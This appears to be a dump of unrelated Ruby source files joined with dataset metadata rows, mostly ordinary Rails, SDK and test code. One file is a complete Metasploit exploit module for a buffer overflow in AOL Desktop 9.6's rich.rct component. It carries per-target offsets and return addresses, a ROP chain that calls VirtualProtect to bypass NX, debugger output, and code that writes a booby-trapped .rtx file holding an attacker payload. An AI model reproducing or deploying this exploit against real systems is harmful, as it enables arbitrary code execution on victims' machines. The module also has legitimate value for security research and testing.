# relative_assets = true
# To disable debugging comments that display the original location of your selectors. Uncomment:
line_comments = false
# If you prefer the indented syntax, you might want to regenerate this
# project again passing --syntax sass, or you can uncomment this:
# preferred_syntax = :sass
# and then run:
# sass-convert -R --from scss --to sass sass scss && rm -rf sass && mv scss sass
| 34.68 | 96 | 0.748558 |
4adf6f8c8b3da20a4227508783dc6f068f638f2d | 8,159 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info={})
super(update_info(info,
'Name' => "AOL Desktop 9.6 RTX Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in AOL Desktop 9.6's Tool\rich.rct
component. By supplying a long string of data in the hyperlink tag, rich.rct copies
this data into a buffer using a strcpy function, which causes an overflow, and
results arbitrary code execution.
},
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'Author' =>
[
'sup3r', #Initial disclosure, poc (9.5)
'sickn3ss', #9.6 poc
'sinn3r', #Metasploit
'mr_me <steventhomasseeley[at]gmail.com>', #NX bypass target
'silent_dream', #Win 7 target
],
'References' =>
[
[ 'OSVDB', '70741'],
[ 'EDB', 16085 ],
],
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0d\x0a\x3e\x7f",
'StackAdjustment' => -3500,
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
},
'Platform' => 'win',
'Targets' =>
[
[
'AOL Desktop 9.6 on Windows XP SP3',
{
'Ret' => 0x01DB4542, #0x01DB4542 JMP ESI
'Offset'=> 5391, #Offset to EIP
'Max' => 8000, #Buffer max. Can be more.
},
],
[
'AOL Desktop 9.6 on Windows XP SP3 - NX bypass',
{
'Ret' => 0x6C02D216, # PUSH ESI, POP ESP, POP ESI, POP EDI, POP EDI, RETN 8
'vp' => 0x7C801AD4, # (kernel32.dll) => VirtualProtect()
'Offset' => 5368, # offset to rop
'Max' => 8000, # Buffer max. Can be more.
},
],
[
'AOL Desktop 9.6 on Windows 7',
{
'Ret' => 0x63227D6D, # JMP ESP in coolapi.dll
'Offset' => 4327, # Offset to EIP
'Max' => 8000, # Buffer max. Can be more
}
],
],
'Privileged' => false,
'DisclosureDate' => "Jan 31 2011",
'DefaultTarget' => 0))
register_options(
[
OptString.new( 'FILENAME', [false, 'The filename', 'msf.rtx'] ),
]
)
end
def exploit
if target.name =~ /XP SP3$/
# Compatible with what the poc has, and what I see on my debugger
sploit = ''
sploit << rand_text_alpha(4968+7)
sploit << payload.encoded
sploit << rand_text_alpha(5368-sploit.length)
sploit << make_nops(11)
sploit << "\xe9\x70\xfe\xff\xff" #JMP back 400 bytes
sploit << [target.ret].pack('V')
sploit << make_nops(target['Offset']-sploit.length-2)
sploit << "\xeb\x04"
sploit << [target.ret].pack('V')
sploit << payload.encoded
sploit << rand_text_alpha(target['Max']-sploit.length)
elsif target.name =~ /SP3 - NX bypass$/
#Thanks mr_me for the ROP chain
rop = ''
# This is the start of ESI
rop << rand_text_alpha(4) # junk - > POP ESI
rop << rand_text_alpha(4) # junk - > POP EDI
rop << rand_text_alpha(4) # junk - > POP EDI
rop << "\x66\x21\x5c\x63" # 0x635C2166 (appdata.dll) => POP ECX; RETN
# Take control of the stack pointer right here (EIP)
rop << [target.ret].pack('V') # junk - > RET 8 on the EIP pointer
rop << rand_text_alpha(4) # junk - > RET 8 on the EIP pointer
# Arg 4 of VirtualProtect() -> lpflOldProtect
rop << "\x4c\x4b\x0e\x69" # 0x690E4B4C => RW addr -----------^^
# Arg 2 of VirtualProtect() -> dwsize (0x212C) & setup EAX
rop << "\xf3\xdf\x4b\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBX; RETN
rop << "\xfd\xc6\xb0\x6b" # 0x6BB0C6FD (imfdecode.rct) => MOV EAX,212C; POP EBX; RETN
rop << rand_text_alpha(4) # junk -------------------------------------------^^
rop << "\xf3\xdf\x4b\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBX; RETN
# Arg 3 of VirtualProtect() -> lpflOldProtectflNewProtect (PAGE_EXECUTE_READWRITE)
rop << "\xbb\x07\x98\x64" # 0x649807BB (abook.dll) => XCHG EAX,EDX; RETN
rop << "\x9e\xe4\xc6\x68" # 0x68C6E49E (www.tol) ======> ADD EAX,10; POP EBP; RETN 4
rop << rand_text_alpha(4) # junk --------------------------------------^^
rop << "\xbb\x07\x98\x64" # 0x649807BB (ebook.dll) => XCHG EAX,EDX; RETN
rop << rand_text_alpha(4) # junk ----------------------------------------------^^
# Arg 1 of VirtualProtect() -> return address & lpAddress
# Also, setup call to VirtualProtect() ptr in ESI
rop << "\x3f\x7b\x1e\x67" # 0x671E7B3F (manager.dll) => PUSH ESP; POP EBP; RETN
rop << "\x2c\x10\x49\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBP; RETN
rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
rop << rand_text_alpha(4) # junk ---------------------------------^^
rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
rop << rand_text_alpha(4) # junk ---------------------------------^^
rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
rop << rand_text_alpha(4) # junk ---------------------------------^^
rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
rop << rand_text_alpha(4) # junk ---------------------------------^^
rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) ===========> ADD EAX,0C; POP ESI; RETN
rop << [target['vp']].pack('V') # VirtualProtect() ----------------------------^^
rop << "\x2c\x10\x49\x67" # 0x6749102C (mip.tol) => XCHG EAX,EBP; RETN
# Continue safely, rop nop
rop << "\xdb\x22\x94\x64" # 0x649422DB (manager.dll) ======> POP EDI; RETN
rop << "\xdc\x22\x94\x64" # 0x649422DC (abook.dll) => RETN ----^^
# gently place our code on the stack
rop << "\x7e\x38\xa0\x60" # 0x60A0387E (abook.dll) ===> PUSHAD; RETN
sploit = rand_text_alpha(target['Offset']-602) #688 was the original
#mr_me's offset
sploit << rop
sploit << make_nops(74)
sploit << payload.encoded
#padding to the next offset
sploit << rand_text_alpha(7)
#the next offset
sploit << rop
sploit << make_nops(74)
sploit << payload.encoded
#Padding
sploit << rand_text_alpha(target['Max']-sploit.length)
elsif target.name =~ /Windows 7/
#Thanks silent_dream
sploit = ''
sploit << rand_text_alpha(target['Offset']-2-14)
sploit << "\xeb\x13"
sploit << make_nops(14)
sploit << [target.ret].pack('V')
sploit << make_nops(15)
sploit << payload.encoded
sploit << rand_text_alpha(target['Max'] - sploit.length)
end
link_value = rand_text_alpha(6)
rtx = "<HTML>"
rtx << "<A HREF=\"#{sploit}\">#{link_value}</A>"
rtx << "</HTML>"
print_status("Creating #{datastore['FILENAME']}...")
file_create(rtx)
end
end
=begin
0:000> g
Breakpoint 0 hit
eax=00000006 ebx=06652370 ecx=02d9c898 edx=038d0000 esi=00000000 edi=02d99b30
eip=6909e187 esp=0022e638 ebp=0022e648 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206
rich!ToolInit+0xed2c:
6909e187 e85cd50300 call rich!ToolInit+0x4c28d (690db6e8)
0:000> g
(8d8.924): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02d38358 ecx=00000000 edx=00000030 esi=02d53cb8 edi=0022e7c4
eip=43434343 esp=0022e760 ebp=0022e780 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
43434343 ?? ???
0:000> dd esi
02d53cb8 43434343 43434343 43434343 43434343
02d53cc8 43434343 43434343 43434343 43434343
02d53cd8 43434343 43434343 43434343 43434343
02d53ce8 43434343 43434343 43434343 43434343
02d53cf8 43434343 43434343 43434343 43434343
02d53d08 43434343 43434343 43434343 43434343
02d53d18 43434343 43434343 43434343 43434343
02d53d28 43434343 43434343 43434343 43434343
=end
| 34.572034 | 90 | 0.595416 |
ff137a46345c8484adc87516be44ecc00647212e | 389 | # Be sure to restart your server when you modify this file.
# Your secret key for verifying the integrity of signed cookies.
# If you change this key, all old signed cookies will become invalid!
# Make sure the secret is at least 30 characters and all random,
# no regular words or you'll be exposed to dictionary attacks.
Lagotto::Application.config.secret_token = CONFIG[:secret_token]
| 48.625 | 69 | 0.784062 |
089cf397499ea661fb3dead0c864d023fdaf1654 | 2,785 | class CreateReports < ActiveRecord::Migration
def self.up
create_table "reports" do |t|
t.string "source", :limit => 3 # Short string to identify source; needed for uniqueid validation
t.integer "reporter_id"
t.integer "location_id"
t.string "uniqueid", :limit => 20 # Unique identifier string for Twitter, SMS, Asterisk
t.string "text" # Text of the report from Twitter, SMS or otherwise
t.integer "score" # Overall "score" of this report (0=no problems)
t.string "zip", :limit => 5 # Extracted zip associated with report
t.integer "wait_time" # Extracted wait time associated with report
t.integer "polling_place_id" # To attach to a polling place
t.timestamps
end
add_index "reports", ["created_at"], :name => "index_reports_on_created_at"
create_table "reporters" do |t|
t.integer "location_id"
t.string "type", :limit => 30 # TwitterReporter, IPhoneReporter, SmsReporter, PhoneReporter
t.string "uniqueid", :limit => 80
t.string "name", :limit => 80
t.string "screen_name", :limit => 80
t.string "profile_location", :limit => 80
t.string "profile_image_url", :limit => 200
t.integer "followers_count"
t.timestamps
end
add_index "reporters", ["uniqueid","type"], :name => "index_reports_on_uniqueid_and_type", :unique => true
create_table "report_tags" do |t|
t.integer "report_id"
t.integer "tag_id"
end
add_index "report_tags", ["report_id"], :name => "index_report_tags_on_report_id"
add_index "report_tags", ["tag_id"], :name => "index_report_tags_on_tag_id"
create_table "tags" do |t|
t.string "pattern", :limit => 30
t.string "description", :limit => 80
t.integer "score"
end
create_table "report_filters", :options => 'ENGINE=MyISAM' do |t|
t.integer "report_id"
t.integer "filter_id"
end
add_index "report_filters", ["report_id"], :name => "index_report_filters_on_report_id"
add_index "report_filters", ["filter_id"], :name => "index_report_filters_on_filter_id"
create_table "polling_places" do |t|
t.integer "location_id"
t.string "name", :limit => 80
t.string "address", :limit => 80
t.string "city", :limit => 80
t.string "state", :limit => 2
t.string "zip", :limit => 10
t.timestamps
end
end
def self.down
drop_table :reports
drop_table :reporters
drop_table :report_tags
drop_table :tags
drop_table :report_filters
drop_table :polling_places
end
end
| 37.133333 | 118 | 0.609695 |
267788d2a4e6c286ea23e43d008cbcc66c8908b2 | 436 | class CreatePreneedSubmissions < ActiveRecord::Migration
def change
create_table :preneed_submissions do |t|
t.string :tracking_number, null: false
t.string :application_uuid, null: true
t.string :return_description, null: false
t.integer :return_code, null: true
t.timestamps null: false
t.index :tracking_number, unique: true
t.index :application_uuid, unique: true
end
end
end
| 27.25 | 56 | 0.706422 |
0350e731c3a31f04d4683fec629e00ce943d1027 | 2,748 | # frozen_string_literal: true
module Neo4j::Driver
module Internal
module Retry
class ExponentialBackoffRetryLogic
include Ext::ExceptionCheckable
DEFAULT_MAX_RETRY_TIME = 30.seconds
INITIAL_RETRY_DELAY = 1.second
RETRY_DELAY_MULTIPLIER = 2.0
RETRY_DELAY_JITTER_FACTOR = 0.2
def initialize(max_retry_time = nil, logger = nil)
@max_retry_time = max_retry_time || DEFAULT_MAX_RETRY_TIME
@log = logger
end
def retry
next_delay = INITIAL_RETRY_DELAY
start_time = nil
errors = nil
begin
check { yield }
rescue Exceptions::Neo4jException => error
if can_retry_on?(error)
curr_time = current_time
start_time ||= curr_time
elapsed_time = curr_time - start_time
if elapsed_time < @max_retry_time
delay_with_jitter = compute_delay_with_jitter(next_delay)
@log&.warn { "Transaction failed and will be retried in #{delay_with_jitter}ms\n#{error}" }
sleep(delay_with_jitter)
next_delay *= RETRY_DELAY_MULTIPLIER
(errors ||= []) << error
retry
end
end
add_suppressed(error, errors)
raise error
end
end
private
def can_retry_on?(error)
error.is_a?(Exceptions::SessionExpiredException) ||
error.is_a?(Exceptions::ServiceUnavailableException) ||
transient_error?(error)
end
def transient_error?(error)
# Retries should not happen when transaction was explicitly terminated by the user.
# Termination of transaction might result in two different error codes depending on where it was
# terminated. These are really client errors but classification on the server is not entirely correct and
# they are classified as transient.
error.is_a?(Exceptions::TransientException) &&
!%w[Neo.TransientError.Transaction.Terminated Neo.TransientError.Transaction.LockClientStopped]
.include?(error.code)
end
def compute_delay_with_jitter(delay)
jitter = delay * RETRY_DELAY_JITTER_FACTOR
min = delay - jitter
max = delay + jitter
@rand ||= Random.new
@rand.rand(min..max)
end
def current_time
Process.clock_gettime(Process::CLOCK_MONOTONIC)
end
def add_suppressed(error, suppressed_errors)
suppressed_errors&.reject(&error.method(:equal?))&.each(&error.method(:add_suppressed))
end
end
end
end
end
| 33.925926 | 115 | 0.60917 |
aba33840ac6516a373da76fa7318de1486db134d | 6,153 | # == Schema Information
#
# Table name: current_route_stop_patterns
#
# id :integer not null, primary key
# onestop_id :string
# geometry :geography({:srid geometry, 4326
# tags :hstore
# stop_pattern :string default([]), is an Array
# version :integer
# created_at :datetime not null
# updated_at :datetime not null
# created_or_updated_in_changeset_id :integer
# route_id :integer
# stop_distances :float default([]), is an Array
# edited_attributes :string default([]), is an Array
# geometry_source :string
#
# Indexes
#
# c_rsp_cu_in_changeset (created_or_updated_in_changeset_id)
# index_current_route_stop_patterns_on_onestop_id (onestop_id) UNIQUE
# index_current_route_stop_patterns_on_route_id (route_id)
# index_current_route_stop_patterns_on_stop_pattern (stop_pattern) USING gin
#
class BaseRouteStopPattern < ActiveRecord::Base
self.abstract_class = true
attr_accessor :traversed_by
attr_accessor :serves
end
class RouteStopPattern < BaseRouteStopPattern
self.table_name_prefix = 'current_'
COORDINATE_PRECISION = 5
# GTFS
has_many :gtfs_entities, class_name: GTFSTrip, foreign_key: :entity_id
belongs_to :route
has_many :schedule_stop_pairs
validates :geometry, :stop_pattern, presence: true
validates :onestop_id, uniqueness: true, on: create
validate :has_at_least_two_stops,
:geometry_has_at_least_two_coords,
:correct_stop_distances_length
extend Enumerize
enumerize :geometry_source, in: [:trip_stop_points, :shapes_txt, :shapes_txt_with_dist_traveled, :user_edited]
def has_at_least_two_stops
if stop_pattern.length < 2
errors.add(:stop_pattern, 'RouteStopPattern needs at least 2 stops')
end
end
def geometry_has_at_least_two_coords
if geometry.nil? || self[:geometry].num_points < 2
errors.add(:geometry, 'RouteStopPattern needs a geometry with least 2 coordinates')
end
end
def correct_stop_distances_length
if stop_pattern.size != stop_distances.size
errors.add(:stop_distances, 'RouteStopPattern stop_distances size must equal stop_pattern size')
end
end
include HasAOnestopId
include HasAGeographicGeometry
include HasTags
include UpdatedSince
include IsAnEntityImportedFromFeeds
include IsAnEntityWithIssues
# Tracked by changeset
include CurrentTrackedByChangeset
current_tracked_by_changeset({
kind_of_model_tracked: :onestop_entity,
virtual_attributes: [
:traversed_by,
:add_imported_from_feeds,
:not_imported_from_feeds
],
protected_attributes: [],
sticky_attributes: [
:geometry
]
})
def update_associations(changeset)
if self.traversed_by
route = Route.find_by_onestop_id!(self.traversed_by)
self.update_columns(route_id: route.id)
end
update_entity_imported_from_feeds(changeset)
super(changeset)
end
# borrowed from schedule_stop_pair.rb
def self.find_by_attributes(attrs = {})
if attrs[:id].present?
find(attrs[:id])
end
end
scope :with_trips, -> (search_string) { where_imported_with_gtfs_id(search_string) }
scope :with_all_stops, -> (search_string) { where{stop_pattern.within(search_string)} }
scope :with_any_stops, -> (stop_onestop_ids) { where( "stop_pattern && ARRAY[?]::varchar[]", stop_onestop_ids ) }
def trips
entities_imported_from_feed.map(&:gtfs_id).uniq.compact
end
def ordered_ssp_trip_chunks(&block)
if block
ScheduleStopPair.where(route_stop_pattern: self).order(:trip, :origin_departure_time).slice_when { |s1, s2|
!s1.trip.eql?(s2.trip)
}.each {|trip_chunk| yield trip_chunk }
end
end
##### FromGTFS ####
def generate_onestop_id
route = self.traversed_by.present? ? self.traversed_by : self.route
stop_pattern = self.serves.present? ? self.serves.map(&:onestop_id) : self.stop_pattern
fail Exception.new('route required') unless route
fail Exception.new('stop_pattern required') unless stop_pattern
fail Exception.new('geometry required') unless self.geometry
onestop_id = OnestopId.handler_by_model(RouteStopPattern).new(
route_onestop_id: route.onestop_id,
stop_pattern: stop_pattern,
geometry_coords: self.geometry[:coordinates]
)
onestop_id.to_s
end
def self.create_from_gtfs(trip, route_onestop_id, stop_pattern, stop_times, trip_stop_points, shape_points)
# both trip_stop_points and stop_pattern correspond to stop_times.
# GTFSGraph should already filter out stop_times of size 0 or 1 (using filter_empty).
# We can still have one unique stop, but must have at least 2 stop times.
raise ArgumentError.new('Need at least two stops') if stop_pattern.length < 2
# Rgeo produces nil if there is only one coordinate in the array
rsp = RouteStopPattern.new(
stop_pattern: stop_pattern,
)
if shape_points.present? && shape_points.size > 1
rsp.geometry = Geometry::LineString.line_string(Geometry::Lib.set_precision(shape_points, COORDINATE_PRECISION))
rsp.geometry_source = Geometry::GTFSShapeDistanceTraveled.validate_shape_dist_traveled(stop_times, shape_points.shape_dist_traveled) ? :shapes_txt_with_dist_traveled : :shapes_txt
else
rsp.geometry = Geometry::LineString.line_string(Geometry::Lib.set_precision(trip_stop_points, COORDINATE_PRECISION))
rsp.geometry_source = :trip_stop_points
end
onestop_id = OnestopId.handler_by_model(RouteStopPattern).new(
route_onestop_id: route_onestop_id,
stop_pattern: rsp.stop_pattern,
geometry_coords: rsp.geometry[:coordinates]
)
rsp.onestop_id = onestop_id.to_s
rsp.tags ||= {}
rsp
end
end
class OldRouteStopPattern < BaseRouteStopPattern
include OldTrackedByChangeset
include HasAGeographicGeometry
end
| 35.982456 | 185 | 0.708435 |
6264aa1d1ebaa2bb41e998f8c945c55911ece6ed | 858 | # encoding: utf-8
require File.expand_path('../../../spec_helper.rb', __FILE__)
describe Backup::Configuration::Compressor::Gzip do
before do
Backup::Configuration::Compressor::Gzip.defaults do |compressor|
compressor.best = true
compressor.fast = true
end
end
after { Backup::Configuration::Compressor::Gzip.clear_defaults! }
it 'should set the default compressor configuration' do
compressor = Backup::Configuration::Compressor::Gzip
compressor.best.should == true
compressor.fast.should == true
end
describe '#clear_defaults!' do
it 'should clear all the defaults, resetting them to nil' do
Backup::Configuration::Compressor::Gzip.clear_defaults!
compressor = Backup::Configuration::Compressor::Gzip
compressor.best.should == nil
compressor.fast.should == nil
end
end
end
| 28.6 | 68 | 0.70979 |
f855a5723efd267d8d75b70861495e8d412128c6 | 581 | #!/usr/bin/env ruby -w
require 'rmagick'
# Demonstrate the annotate method
Text = 'RMagick'
granite = Magick::ImageList.new('granite:')
canvas = Magick::ImageList.new
canvas.new_image(300, 100, Magick::TextureFill.new(granite))
text = Magick::Draw.new
text.pointsize = 52
text.gravity = Magick::CenterGravity
text.annotate(canvas, 0,0,2,2, Text) do
self.fill = 'gray83'
end
text.annotate(canvas, 0,0,-1.5,-1.5, Text) do
self.fill = 'gray40'
end
text.annotate(canvas, 0,0,0,0, Text) do
self.fill = 'darkred'
end
#canvas.display
canvas.write('rubyname.gif')
exit
| 18.741935 | 60 | 0.70568 |
11758c7be601cc677d39bd7f4ebd7ecfeb835a99 | 1,415 | require "test/unit"
class BSTTest < Test::Unit::TestCase
def test_bst
assert_equal(nil, BST.new.get("a"))
assert_equal(1, BST.new.add_all({"a" => 1, "b" => 2}).get("a"))
bst = BST.new.add_all({"a" => 1, "b" => 2, "c" => 3})
assert_equal(1, bst.get("a"))
assert_equal(2, bst.get("b"))
assert_equal(3, bst.get("c")) # was wrong test condition
assert_equal(nil, bst.get("d"))
end
private
class BST
def add_all entries
entries.each { |key, value| @root = do_add(key, value, @root) }
self
end
def get key
do_get(key, @root) # forgot to implement
end
private
def do_get key, node
if node.nil?
nil
else
if key == node.key
node.value
elsif key > node.key
do_get(key, node.right)
else
do_get(key, node.left)
end
end
end
def do_add key, value, node
if node.nil? then
Node.new(key, value)
else
if key > node.key # compared with value
node.right = do_add(key, value, node.right)
else
node.left = do_add(key, value, node.left)
end
node
end
end
end
class Node
attr_accessor :key, :value, :left, :right
def initialize key, value, left = nil, right = nil
@key = key
@value = value
@left = left
@right = right
end
end
end
| 20.214286 | 69 | 0.542756 |
e85c97ad16e638cfe017b063d40bcda06c8ea3cc | 426 | Rails.application.routes.draw do
resources :friendships, only: [:new, :create]
resources :messages
resources :sessions, only: [:new, :create]
resources :users
root 'home#index'
delete 'log_out' => 'sessions#destroy'
get 'all_friends' => 'users#all_friends'
delete 'unfriend' => 'friendships#destroy'
get 'sent_messages' => 'messages#sent_messages'
get 'auth/:provider/callback' => 'sessions#callback'
end
| 32.769231 | 54 | 0.713615 |
1ddf7e7fe330603bb1c40f86e7c33822349a529e | 4,349 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Consumption::Mgmt::V2019_06_01
module Models
#
# The notification associated with a budget.
#
class Notification
include MsRestAzure
# @return [Boolean] The notification is enabled or not.
attr_accessor :enabled
# @return [OperatorType] The comparison operator. Possible values
# include: 'EqualTo', 'GreaterThan', 'GreaterThanOrEqualTo'
attr_accessor :operator
# @return Threshold value associated with a notification. Notification is
# sent when the cost exceeded the threshold. It is always percent and has
# to be between 0 and 1000.
attr_accessor :threshold
# @return [Array<String>] Email addresses to send the budget notification
# to when the threshold is exceeded.
attr_accessor :contact_emails
# @return [Array<String>] Contact roles to send the budget notification
# to when the threshold is exceeded.
attr_accessor :contact_roles
# @return [Array<String>] Action groups to send the budget notification
# to when the threshold is exceeded.
attr_accessor :contact_groups
#
# Mapper for Notification class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'Notification',
type: {
name: 'Composite',
class_name: 'Notification',
model_properties: {
enabled: {
client_side_validation: true,
required: true,
serialized_name: 'enabled',
type: {
name: 'Boolean'
}
},
operator: {
client_side_validation: true,
required: true,
serialized_name: 'operator',
type: {
name: 'String'
}
},
threshold: {
client_side_validation: true,
required: true,
serialized_name: 'threshold',
type: {
name: 'Number'
}
},
contact_emails: {
client_side_validation: true,
required: true,
serialized_name: 'contactEmails',
constraints: {
MaxItems: 50,
MinItems: 1
},
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
contact_roles: {
client_side_validation: true,
required: false,
serialized_name: 'contactRoles',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
contact_groups: {
client_side_validation: true,
required: false,
serialized_name: 'contactGroups',
constraints: {
MaxItems: 50,
MinItems: 0
},
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
}
}
}
}
end
end
end
end
| 31.064286 | 79 | 0.464705 |
ac61ded99ac9a63ab85a1a31a8ba9c4f04519ac2 | 2,380 | namespace :data_requests do
# UUIDS=123abc,456def rake data_requests:lookup_users_by_device
desc 'Recursively lookup users using a network of shared devices'
task lookup_users_by_device: :environment do
ActiveRecord::Base.connection.execute('SET statement_timeout = 0')
uuids = ENV.fetch('UUIDS', '').split(',')
users = uuids.map { |uuid| DataRequests::LookupUserByUuid.new(uuid).call }.compact
result = DataRequests::LookupSharedDeviceUsers.new(users).call
puts JSON.pretty_generate(result)
puts "UUIDS: #{result.values.flatten.uniq.join(',')}"
end
# UUIDS=123abc,456def REQUESTING_ISSUER=sample:app:issuer rake data_requests:create_users_report
desc 'Create a JSON report with data for the specified users'
task create_users_report: :environment do
uuids = ENV.fetch('UUIDS', '').split(',')
requesting_issuers = ENV.fetch('REQUESTING_ISSUER', nil)&.split(',')
output = uuids.map do |uuid|
user = DataRequests::LookupUserByUuid.new(uuid).call
next warn("No record for uuid #{uuid}") if user.nil?
DataRequests::CreateUserReport.new(user, requesting_issuers).call
end.compact.to_json
puts output
end
# export USERS_REPORT=/tmp/query-2020-11-17/user_report.json
# export OUTPUT_DIR=/tmp/query-2020-11-17/results/
# rake data_requests:process_users_report
desc 'Take a JSON user report, download logs from cloud watch, and write user data'
task process_users_report: :environment do
users_report = JSON.parse(File.read(ENV['USERS_REPORT']), symbolize_names: true)
output_dir = ENV['OUTPUT_DIR']
users_report.each do |user_report|
puts "Processing user: #{user_report[:requesting_issuer_uuid]}"
user_output_dir = File.join(output_dir, user_report[:requesting_issuer_uuid])
FileUtils.mkdir_p(user_output_dir)
DataRequests::WriteUserInfo.new(user_report, user_output_dir).call
DataRequests::WriteUserEvents.new(user_report, user_output_dir).call
cloudwatch_dates = user_report[:user_events].map { |row| row[:date_time] }.map do |date_time|
Time.zone.parse(date_time).to_date
end.uniq
cloudwatch_results = DataRequests::FetchCloudwatchLogs.new(
user_report[:login_uuid],
cloudwatch_dates,
).call
DataRequests::WriteCloudwatchLogs.new(cloudwatch_results, user_output_dir).call
end
end
end
| 41.754386 | 99 | 0.735714 |
e86b09f156d95775cd21782ccd519d34bde27006 | 560 | # frozen_string_literal: true
require "spec_helper"
describe GraphQL::StaticValidation::FragmentTypesExist do
include StaticValidationHelpers
let(:query_string) {"
fragment on Cheese {
id
flavor
}
"}
it "finds non-existent types on fragments" do
assert_equal(1, errors.length)
fragment_def_error = {
"message"=>"Fragment definition has no name",
"locations"=>[{"line"=>2, "column"=>5}],
"fields"=>["fragment "],
}
assert_includes(errors, fragment_def_error, "on fragment definitions")
end
end
| 23.333333 | 74 | 0.673214 |
ffe6a79f68e0ef247fd36461c3a298daf19f678b | 224 | class CreateAccountBooks < ActiveRecord::Migration
def change
create_table :account_books do |t|
t.references :account
t.references :book
t.string :lean_pub_link
t.timestamps
end
end
end
| 18.666667 | 50 | 0.6875 |
1cccc3d7dd34ccd2b4ac0d40d44c5b872c2064a2 | 1,593 | require 'orm_adapter'
module Ckeditor
IMAGE_TYPES = ['image/jpeg', 'image/png', 'image/gif', 'image/jpg', 'image/pjpeg', 'image/tiff', 'image/x-png']
autoload :Utils, 'ckeditor/utils'
autoload :Http, 'ckeditor/http'
module Helpers
autoload :ViewHelper, 'ckeditor/helpers/view_helper'
autoload :FormHelper, 'ckeditor/helpers/form_helper'
autoload :FormBuilder, 'ckeditor/helpers/form_builder'
autoload :Controllers, 'ckeditor/helpers/controllers'
end
module Hooks
autoload :FormtasticBuilder, 'ckeditor/hooks/formtastic'
autoload :SimpleFormBuilder, 'ckeditor/hooks/simple_form'
end
module Backend
autoload :Paperclip, 'ckeditor/backend/paperclip'
autoload :CarrierWave, 'ckeditor/backend/carrierwave'
end
# Allowed image file types for upload.
# Set to nil or [] (empty array) for all file types
mattr_accessor :image_file_types
@@image_file_types = ["jpg", "jpeg", "png", "gif", "tiff"]
# Allowed attachment file types for upload.
# Set to nil or [] (empty array) for all file types
mattr_accessor :attachment_file_types
@@attachment_file_types = ["doc", "docx", "xls", "odt", "ods", "pdf", "rar", "zip", "tar", "tar.gz", "swf"]
# Default way to setup Ckeditor. Run rails generate ckeditor to create
# a fresh initializer with all configuration values.
def self.setup
yield self
end
def self.picture_model
Ckeditor::Picture.to_adapter
end
def self.attachment_file_model
Ckeditor::AttachmentFile.to_adapter
end
end
require 'ckeditor/engine'
require 'ckeditor/version'
| 30.056604 | 113 | 0.711237 |
619a58cc77f81b8c6acd9dc371fffefb6d939b6f | 1,096 | cask 'filezilla' do
if MacOS.version <= :snow_leopard
version '3.8.1'
sha256 '86c725246e2190b04193ce8e7e5ea89d5b9318e9f20f5b6f9cdd45b6f5c2d283'
else
version '3.24.0'
sha256 '6f57b0c91d0f20d545cd854855d35dcb1b088bc9e2c73cfaca4984bda93df5a9'
end
# sourceforge.net/filezilla was verified as official when first introduced to the cask
url "https://downloads.sourceforge.net/filezilla/FileZilla_Client/#{version}/FileZilla_#{version}_macosx-x86.app.tar.bz2"
appcast 'https://sourceforge.net/projects/filezilla/rss?path=/FileZilla_Client',
checkpoint: '4b4bb69191e36ac2e2f36d306840e496435f345683d74bf348c9ef95ce818f3e'
name 'FileZilla'
homepage 'https://filezilla-project.org/'
app 'FileZilla.app'
zap delete: [
'~/.config/filezilla',
'~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/de.filezilla.sfl',
'~/Library/Saved Application State/de.filezilla.savedState',
'~/Library/Preferences/de.filezilla.plist',
]
end
| 42.153846 | 144 | 0.730839 |
1c0158d81ba29c254ba093b2870e184f49d4b966 | 1,080 | # == Schema Information
#
# Table name: visits
#
# id :integer not null, primary key
# visit_token :string
# visitor_token :string
# ip :string
# user_agent :text
# referrer :text
# landing_page :text
# user_id :integer
# referring_domain :string
# search_keyword :string
# browser :string
# os :string
# device_type :string
# screen_height :integer
# screen_width :integer
# country :string
# region :string
# city :string
# postal_code :string
# latitude :decimal(, )
# longitude :decimal(, )
# utm_source :string
# utm_medium :string
# utm_term :string
# utm_content :string
# utm_campaign :string
# started_at :datetime
#
# Indexes
#
# index_visits_on_user_id (user_id)
# index_visits_on_visit_token (visit_token) UNIQUE
#
class Visit < ApplicationRecord
has_many :ahoy_events, class_name: "Ahoy::Event"
belongs_to :user, optional: true
end
| 25.116279 | 59 | 0.587037 |
3375883e6ff7aaa76ba387f3d731add3dab2579c | 329 | module Ecm::Meta
module Generators
class GuardRspecGenerator < Rails::Generators::Base
desc 'Installs Guard Rspec'
def add_to_application_gemfile
append_file 'Gemfile.application', "\ngem 'guard-rspec', group: :development"
